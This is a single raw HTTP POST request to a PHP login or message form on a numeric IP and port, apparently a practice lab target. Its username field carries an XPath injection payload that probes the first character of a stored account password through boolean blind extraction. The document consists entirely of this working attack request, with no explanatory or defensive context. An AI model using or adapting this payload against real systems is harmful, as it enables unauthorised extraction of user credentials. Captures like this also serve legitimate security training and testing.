POST /index.php HTTP/1.1
Host: 94.237.50.242:44878
Content-Length: 82
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Origin: http://94.237.50.242:44878
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.50.242:44878/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

username=test'+or+substring(/accounts/acc[1]/password,1,1)='H'+and+'1'='1&msg=blah